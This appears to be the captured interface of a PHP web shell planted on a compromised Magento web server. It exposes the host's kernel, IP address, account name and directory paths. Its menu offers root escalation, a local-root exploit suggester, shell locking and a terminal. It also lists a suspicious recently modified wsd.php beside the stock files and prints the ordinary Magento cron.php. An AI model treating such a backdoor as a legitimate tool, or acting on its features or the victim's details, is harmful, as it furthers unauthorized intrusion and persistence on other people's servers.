Linux host2.homegym.sg 4.18.0-553.8.1.el8_10.x86_64 #1 SMP Tue Jul 2 07:26:33 EDT 2024 x86_64
Apache
Server IP : 159.223.38.192 & Your IP : 159.223.38.192
Domains : 20 Domain
User : eachadea
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Lock Shell
Lock File++
Readme
/
home /
eachadea /
public_html /
m2 /
pub /
Delete
Unzip
Name
Size
Permission
Date
Action
errors
[ DIR ]
dr-xr-xr-x
2023-01-23 10:02
media
[ DIR ]
drwxr-xr-x
2025-10-30 17:01
mediaamasty
[ DIR ]
drwxr-xr-x
2020-12-15 04:30
opt
[ DIR ]
drwxr-xr-x
2021-06-18 03:17
static
[ DIR ]
drwxrwsrwx
2025-02-20 12:23
.htaccess
8.2
KB
-rw-r--r--
2025-10-28 19:05
.user.ini
101
B
-rw-r--r--
2023-01-06 06:58
ads.txt
58
B
-rw-r--r--
2025-10-30 01:35
cron.php
1.01
KB
-rw-r--r--
2023-01-06 06:58
get.php
2.82
KB
-rw-r--r--
2023-01-06 06:58
health_check.php
3.4
KB
-rw-r--r--
2023-01-06 06:58
index.php
821
B
-rw-r--r--
2023-01-06 06:58
static.php
445
B
-rw-r--r--
2023-01-06 06:58
wsd.php
38.94
KB
-rw-r--r--
2025-10-28 19:24
Save
Rename
<?php /** * Scheduled jobs entry point * * Copyright © Magento, Inc. All rights reserved. * See COPYING.txt for license details. */ use Magento\Store\Model\Store; use Magento\Store\Model\StoreManager; require dirname(__DIR__) . '/app/bootstrap.php'; if (php_sapi_name() === 'cli') { echo "You cannot run this from the command line." . PHP_EOL . "Run \"php bin/magento cron:run\" instead." . PHP_EOL; exit(1); } else { $opt = $_GET; } try { foreach ($opt as $key => $value) { $opt[$key] = escapeshellarg($value); } $opt['standaloneProcessStarted'] = '0'; $params = $_SERVER; $params[StoreManager::PARAM_RUN_CODE] = 'admin'; $params[Store::CUSTOM_ENTRY_POINT_PARAM] = true; $bootstrap = \Magento\Framework\App\Bootstrap::create(BP, $params); /** @var \Magento\Framework\App\Cron $app */ $app = $bootstrap->createApplication(\Magento\Framework\App\Cron::class, ['parameters' => $opt]); $bootstrap->run($app); } catch (\Exception $e) { echo $e; exit(1); }